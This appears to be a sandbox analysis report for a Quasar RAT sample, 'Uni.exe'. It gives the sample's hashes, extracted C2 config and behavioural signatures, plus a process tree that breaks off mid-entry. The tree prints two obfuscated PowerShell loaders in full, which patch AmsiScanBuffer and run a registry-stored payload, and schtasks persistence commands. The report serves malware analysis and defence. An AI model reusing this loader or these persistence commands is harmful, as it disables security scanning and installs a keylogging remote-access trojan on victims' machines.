Analysis

  • max time kernel
    1800s
  • max time network
    1800s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08-05-2024 17:27

General

  • Target

    Uni.exe

  • Size

    409KB

  • MD5

    7417c8c73e614f293152575f46134216

  • SHA1

    cc68f7f5e7c769efb5b3e06bfb3a2f9329f37805

  • SHA256

    00c7cb06bebe0da961155dc00f7ea7f96a3b04c89ae82408e7ece6968c91c3c3

  • SHA512

    897a859e609028157f2721d76b97497d4b9f821d2b8be3359d1192ddc3a83d4b7449db25c63c3c260067b796c122194c48747dc611c98dc1e33aab82a20b98b0

  • SSDEEP

    6144:nMr2pJAJcC0B632U3GRbMfgvKFFhTEDPX1NbKoEn5MSU+h2f8/14m:LpyJcC+82U3GRGGp1M5Ys2f8/6m

Malware Config

Extracted

Family

quasar

Version

3.1.5

Botnet

SLAVE

C2

even-lemon.gl.at.ply.gg:33587

Mutex

$Sxr-dOMA5C0pQTTpKjVsCp

Attributes
  • encryption_key

    UBXs44u6E81wxBGZxQHk

  • install_name

    $sxr-powershell.exe

  • log_directory

    $SXR-KEYLOGS

  • reconnect_delay

    3000

  • startup_key

    $sxr-powershell

  • subdirectory

    $sxr-seroxen2

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 10 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:612
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1012
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{a4ef60cd-4bb3-46d6-b7cb-5af215ff7de5}
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3720
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{22b2db06-4f69-4058-b138-35f4defd90fa}
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4580
    • C:\Windows\system32\lsass.exe
      C:\Windows\system32\lsass.exe
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:664
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
      1⤵
        PID:940
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
        1⤵
          PID:404
        • C:\Windows\System32\svchost.exe
          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
          1⤵
            PID:936
          • C:\Windows\System32\svchost.exe
            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
            1⤵
              PID:1084
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
              1⤵
                PID:1100
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                1⤵
                • Drops file in System32 directory
                PID:1160
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                1⤵
                  PID:1184
                  • C:\Windows\system32\taskhostw.exe
                    taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                    2⤵
                      PID:2672
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:KtDFqiZwncRE{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$epQLeSohfBUCNX,[Parameter(Position=1)][Type]$OHqAydPJSy)$sRmoMrhXZVD=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+'c'+[Char](116)+''+'e'+''+[Char](100)+'D'+[Char](101)+'l'+'e'+''+[Char](103)+'a'+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'n'+'M'+''+[Char](101)+''+[Char](109)+''+'o'+'ry'+[Char](77)+''+'o'+''+[Char](100)+'u'+'l'+''+[Char](101)+'',$False).DefineType('M'+[Char](121)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+''+'g'+'ate'+[Char](84)+''+'y'+''+[Char](112)+''+[Char](101)+'','C'+[Char](108)+'as'+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+[Char](99)+''+','+''+[Char](83)+'e'+'a'+''+'l'+'e'+'d'+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+'i'+'C'+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+'t'+''+[Char](111)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s',[MulticastDelegate]);$sRmoMrhXZVD.DefineConstructor(''+'R'+''+[Char](84)+''+[Char](83)+''+'p'+''+[Char](101)+'cia'+[Char](108)+'Na'+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+'S'+''+'i'+''+'g'+''+[Char](44)+'P'+[Char](117)+''+[Char](98)+''+'l'+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$epQLeSohfBUCNX).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+[Char](116)+'i'+[Char](109)+'e'+[Char](44)+'M'+[Char](97)+''+'n'+'a'+[Char](103)+'e'+'d'+'');$sRmoMrhXZVD.DefineMethod(''+'I'+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+'k'+''+[Char](101)+'',''+[Char](80)+'u'+[Char](98)+''+'l'+''+[Char](105)+''+'c'+''+[Char](44)+''+[Char](72)+'id'+[Char](101)+''+'B'+''+'y'+''+'S'+''+[Char](105)+''+[Char](103)+','+[Char](78)+''+[Char](101)+'wS'+[Char](108)+''+[Char](111)+''+'t'+''+','+'V'+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+'a'+'l'+'',$OHqAydPJSy,$epQLeSohfBUCNX).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+'e'+''+','+''+[Char](77)+''+'a'+''+'n'+''+[Char](97)+''+'g'+''+'e'+''+'d'+'');Write-Output $sRmoMrhXZVD.CreateType();}$hTgQHJGVxzAbd=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+'s'+'t'+[Char](101)+''+[Char](109)+''+[Char](46)+'d'+'l'+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+'cr'+'o'+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+[Char](116)+'.'+[Char](87)+''+[Char](105)+''+'n'+'32'+[Char](46)+''+'U'+'ns'+'a'+'f'+'e'+''+'N'+''+'a'+'t'+[Char](105)+''+[Char](118)+''+[Char](101)+''+[Char](77)+''+[Char](101)+'t'+'h'+'o'+'d'+''+[Char](115)+'');$MhkUnzRfbidESP=$hTgQHJGVxzAbd.GetMethod('G'+'e'+''+[Char](116)+''+'P'+''+'r'+''+'o'+''+'c'+''+[Char](65)+'d'+'d'+''+[Char](114)+''+[Char](101)+'s'+[Char](115)+'',[Reflection.BindingFlags](''+'P'+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+'c'+''+','+''+'S'+'ta'+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$DOtlBnemggKoWkZRzJd=KtDFqiZwncRE @([String])([IntPtr]);$njlsGkLwPClAaQcQBXUloZ=KtDFqiZwncRE @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$cAugaBKmCBe=$hTgQHJGVxzAbd.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+'M'+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+'e'+''+[Char](72)+''+[Char](97)+'nd'+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+[Char](101)+''+[Char](114)+'n'+[Char](101)+'l'+[Char](51)+''+[Char](50)+'.d'+[Char](108)+''+[Char](108)+'')));$RlNYIzauoFGDlO=$MhkUnzRfbidESP.Invoke($Null,@([Object]$cAugaBKmCBe,[Object]('L'+'o'+'adL'+[Char](105)+'b'+'r'+''+[Char](97)+''+'r'+''+'y'+''+[Char](65)+'')));$eVOBTJGgTWdSrrVLD=$MhkUnzRfbidESP.Invoke($Null,@([Object]$cAugaBKmCBe,[Object](''+'V'+''+'i'+''+'r'+''+[Char](116)+''+[Char](117)+'a'+'l'+'P'+'r'+''+[Char](111)+''+[Char](116)+''+'e'+''+[Char](99)+''+'t'+'')));$oPvgJTZ=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($RlNYIzauoFGDlO,$DOtlBnemggKoWkZRzJd).Invoke(''+[Char](97)+''+'m'+'s'+'i'+''+[Char](46)+'d'+[Char](108)+'l');$RYAaeaZCIlNGQnUpR=$MhkUnzRfbidESP.Invoke($Null,@([Object]$oPvgJTZ,[Object](''+'A'+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+[Char](99)+''+'a'+'n'+[Char](66)+''+[Char](117)+''+'f'+''+[Char](102)+'er')));$iVmZCVrBQE=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($eVOBTJGgTWdSrrVLD,$njlsGkLwPClAaQcQBXUloZ).Invoke($RYAaeaZCIlNGQnUpR,[uint32]8,4,[ref]$iVmZCVrBQE);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$RYAaeaZCIlNGQnUpR,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($eVOBTJGgTWdSrrVLD,$njlsGkLwPClAaQcQBXUloZ).Invoke($RYAaeaZCIlNGQnUpR,[uint32]8,0x20,[ref]$iVmZCVrBQE);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+'F'+''+[Char](84)+''+[Char](87)+''+[Char](65)+'R'+[Char](69)+'').GetValue(''+[Char](36)+''+[Char](55)+''+'7'+'st'+[Char](97)+''+[Char](103)+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                      2⤵
                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                      • Drops file in System32 directory
                      • Suspicious use of SetThreadContext
                      • Modifies data under HKEY_USERS
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:2096
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:yLLVgvYmyfhb{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$XmzbmjjkUPUYrn,[Parameter(Position=1)][Type]$cotfaYcQUW)$JPHcrZlDnGL=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'f'+'l'+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+[Char](101)+'l'+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+''+[Char](77)+''+[Char](101)+''+'m'+'or'+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+'u'+'l'+'e'+'',$False).DefineType(''+[Char](77)+'yD'+'e'+''+[Char](108)+''+[Char](101)+'g'+'a'+''+[Char](116)+'e'+'T'+'y'+[Char](112)+''+'e'+'',''+[Char](67)+''+[Char](108)+''+'a'+''+'s'+''+[Char](115)+''+','+''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+'ic'+[Char](44)+''+[Char](83)+''+[Char](101)+'al'+'e'+'d'+','+'A'+[Char](110)+''+[Char](115)+''+[Char](105)+''+[Char](67)+''+'l'+''+[Char](97)+''+'s'+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+'u'+''+'t'+''+[Char](111)+''+'C'+''+'l'+''+[Char](97)+'s'+[Char](115)+'',[MulticastDelegate]);$JPHcrZlDnGL.DefineConstructor(''+[Char](82)+'T'+[Char](83)+'p'+[Char](101)+''+'c'+''+'i'+'al'+[Char](78)+''+'a'+''+[Char](109)+'e'+[Char](44)+''+[Char](72)+''+'i'+''+[Char](100)+''+[Char](101)+''+'B'+''+'y'+''+[Char](83)+'i'+'g'+''+','+''+[Char](80)+'u'+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$XmzbmjjkUPUYrn).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+'i'+[Char](109)+'e'+[Char](44)+''+'M'+''+[Char](97)+''+'n'+'ag'+[Char](101)+'d');$JPHcrZlDnGL.DefineMethod(''+[Char](73)+'nv'+'o'+''+[Char](107)+''+'e'+'',''+[Char](80)+''+'u'+'b'+[Char](108)+''+'i'+''+[Char](99)+''+','+''+[Char](72)+''+'i'+''+'d'+'e'+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+'g,Ne'+[Char](119)+''+'S'+''+[Char](108)+''+'o'+'t,'+'V'+''+'i'+''+[Char](114)+''+[Char](116)+'u'+[Char](97)+''+'l'+'',$cotfaYcQUW,$XmzbmjjkUPUYrn).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+''+'e'+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $JPHcrZlDnGL.CreateType();}$lwBKZWItQSqkn=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+''+[Char](116)+''+[Char](101)+'m'+[Char](46)+'d'+'l'+'l')}).GetType('M'+[Char](105)+''+[Char](99)+''+'r'+'o'+[Char](115)+''+'o'+''+[Char](102)+'t'+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+'3'+[Char](50)+''+[Char](46)+''+[Char](85)+'n'+[Char](115)+'afeN'+[Char](97)+''+'t'+''+[Char](105)+''+'v'+''+'e'+'Meth'+[Char](111)+''+[Char](100)+'s');$KihYwTtPklnyWP=$lwBKZWItQSqkn.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+[Char](80)+''+[Char](114)+''+'o'+''+'c'+''+[Char](65)+'dd'+[Char](114)+''+[Char](101)+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags]('P'+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+'c'+''+','+'S'+'t'+''+[Char](97)+''+[Char](116)+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$YauLUkDKGdPByfHTCxa=yLLVgvYmyfhb @([String])([IntPtr]);$tbyUOCXALIcoquoFmFGWVU=yLLVgvYmyfhb @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$ANVnChRqSZI=$lwBKZWItQSqkn.GetMethod('G'+'e'+''+[Char](116)+''+'M'+''+[Char](111)+''+[Char](100)+''+'u'+''+'l'+''+[Char](101)+''+[Char](72)+''+[Char](97)+''+'n'+''+[Char](100)+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+'n'+'el'+[Char](51)+''+[Char](50)+'.'+[Char](100)+'ll')));$IKZmpMYlOQbuXt=$KihYwTtPklnyWP.Invoke($Null,@([Object]$ANVnChRqSZI,[Object]('L'+'o'+''+[Char](97)+'d'+[Char](76)+''+[Char](105)+'b'+'r'+'a'+[Char](114)+''+[Char](121)+'A')));$QvwycglbzTFWaJkyr=$KihYwTtPklnyWP.Invoke($Null,@([Object]$ANVnChRqSZI,[Object]('V'+[Char](105)+''+[Char](114)+'t'+[Char](117)+''+[Char](97)+''+[Char](108)+''+'P'+''+[Char](114)+''+'o'+''+[Char](116)+'ec'+[Char](116)+'')));$kfpuVuX=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IKZmpMYlOQbuXt,$YauLUkDKGdPByfHTCxa).Invoke(''+[Char](97)+''+'m'+''+[Char](115)+''+'i'+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+'l'+'');$tEiWGVbTqeSFnzwxf=$KihYwTtPklnyWP.Invoke($Null,@([Object]$kfpuVuX,[Object]('A'+[Char](109)+''+[Char](115)+''+'i'+''+[Char](83)+''+[Char](99)+''+'a'+'n'+[Char](66)+''+'u'+''+[Char](102)+''+'f'+'e'+[Char](114)+'')));$OyJKCdDplp=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($QvwycglbzTFWaJkyr,$tbyUOCXALIcoquoFmFGWVU).Invoke($tEiWGVbTqeSFnzwxf,[uint32]8,4,[ref]$OyJKCdDplp);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$tEiWGVbTqeSFnzwxf,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($QvwycglbzTFWaJkyr,$tbyUOCXALIcoquoFmFGWVU).Invoke($tEiWGVbTqeSFnzwxf,[uint32]8,0x20,[ref]$OyJKCdDplp);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+'F'+''+[Char](84)+''+'W'+''+[Char](65)+'R'+[Char](69)+'').GetValue(''+'$'+''+[Char](55)+'7st'+'a'+''+[Char](103)+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                      2⤵
                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                      • Drops file in System32 directory
                      • Suspicious use of SetThreadContext
                      • Modifies data under HKEY_USERS
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4868
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                    1⤵
                      PID:1244
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                      1⤵
                        PID:1320
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                        1⤵
                          PID:1336
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                          1⤵
                            PID:1428
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                            1⤵
                              PID:1440
                              • C:\Windows\system32\sihost.exe
                                sihost.exe
                                2⤵
                                • Modifies registry class
                                PID:2520
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                              1⤵
                                PID:1500
                              • C:\Windows\System32\svchost.exe
                                C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                1⤵
                                  PID:1528
                                • C:\Windows\System32\svchost.exe
                                  C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                  1⤵
                                    PID:1644
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                    1⤵
                                      PID:1692
                                    • C:\Windows\System32\svchost.exe
                                      C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                      1⤵
                                        PID:1744
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                        1⤵
                                          PID:1772
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                          1⤵
                                            PID:1888
                                          • C:\Windows\system32\svchost.exe
                                            C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                            1⤵
                                              PID:1964
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                              1⤵
                                                PID:1980
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                1⤵
                                                  PID:1348
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                  1⤵
                                                    PID:1640
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                    1⤵
                                                      PID:1896
                                                    • C:\Windows\System32\spoolsv.exe
                                                      C:\Windows\System32\spoolsv.exe
                                                      1⤵
                                                        PID:2128
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                        1⤵
                                                          PID:2184
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                          1⤵
                                                            PID:2340
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                            1⤵
                                                              PID:2552
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                              1⤵
                                                                PID:2624
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                1⤵
                                                                  PID:2632
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                  1⤵
                                                                  • Drops file in System32 directory
                                                                  PID:2736
                                                                • C:\Windows\sysmon.exe
                                                                  C:\Windows\sysmon.exe
                                                                  1⤵
                                                                    PID:2824
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                    1⤵
                                                                      PID:2840
                                                                    • C:\Windows\System32\svchost.exe
                                                                      C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                      1⤵
                                                                        PID:2848
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                        1⤵
                                                                          PID:2856
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                          1⤵
                                                                            PID:2888
                                                                          • C:\Windows\system32\wbem\unsecapp.exe
                                                                            C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                            1⤵
                                                                              PID:3084
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                              1⤵
                                                                                PID:3436
                                                                              • C:\Windows\Explorer.EXE
                                                                                C:\Windows\Explorer.EXE
                                                                                1⤵
                                                                                • Modifies registry class
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                • Suspicious use of UnmapMainImage
                                                                                PID:3536
                                                                                • C:\Users\Admin\AppData\Local\Temp\Uni.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\Uni.exe"
                                                                                  2⤵
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  • Suspicious use of WriteProcessMemory
                                                                                  PID:380
                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                    "schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Uni.exe" /rl HIGHEST /f
                                                                                    3⤵
                                                                                    • Creates scheduled task(s)
                                                                                    PID:3300
                                                                                  • C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe
                                                                                    "C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe"
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:1580
                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                      "schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe" /rl HIGHEST /f
                                                                                      4⤵
                                                                                      • Creates scheduled task(s)
                                                                                      PID:3156
                                                                                    • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\install.exe"
                                                                                      4⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:2368
                                                                                  • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\install.exe"
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:3660
                                                                                  • C:\Windows\SysWOW64\SCHTASKS.exe
                                                                                    "SCHTASKS.exe" /create /tn "$77Uni.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\Uni.exe'" /sc onlogon /rl HIGHEST
                                                                                    3⤵
                                                                                    • Creates scheduled task(s)
                                                                                    PID:624
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                1⤵
                                                                                  PID:3648
                                                                                • C:\Windows\system32\DllHost.exe
                                                                                  C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                  1⤵
                                                                                    PID:3836
                                                                                  • C:\Windows\System32\RuntimeBroker.exe
                                                                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                    1⤵
                                                                                      PID:3992
                                                                                    • C:\Windows\System32\RuntimeBroker.exe
                                                                                      C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                      1⤵
                                                                                        PID:2408
                                                                                      • C:\Windows\System32\RuntimeBroker.exe
                                                                                        C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                        1⤵
                                                                                          PID:4840
                                                                                        • C:\Windows\system32\SppExtComObj.exe
                                                                                          C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                          1⤵
                                                                                            PID:3304
                                                                                          • C:\Windows\System32\svchost.exe
                                                                                            C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                            1⤵
                                                                                              PID:2284
                                                                                            • C:\Windows\system32\svchost.exe
                                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                              1⤵
                                                                                                PID:1672
                                                                                              • C:\Windows\System32\svchost.exe
                                                                                                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                1⤵
                                                                                                  PID:4936
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                  1⤵
                                                                                                    PID:1140
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                    1⤵
                                                                                                    • Modifies data under HKEY_USERS
                                                                                                    PID:1756
                                                                                                  • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                    "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                    1⤵
                                                                                                    • Modifies data under HKEY_USERS
                                                                                                    PID:1352
                                                                                                  • C:\Windows\system32\DllHost.exe
                                                                                                    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                    1⤵
                                                                                                    • Drops file in System32 directory
                                                                                                    PID:1028
                                                                                                  • C:\Windows\System32\RuntimeBroker.exe
                                                                                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                    1⤵
                                                                                                      PID:4456
                                                                                                    • C:\Windows\System32\RuntimeBroker.exe
                                                                                                      C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                      1⤵
                                                                                                        PID:4900
                                                                                                      • C:\Windows\system32\wbem\wmiprvse.exe
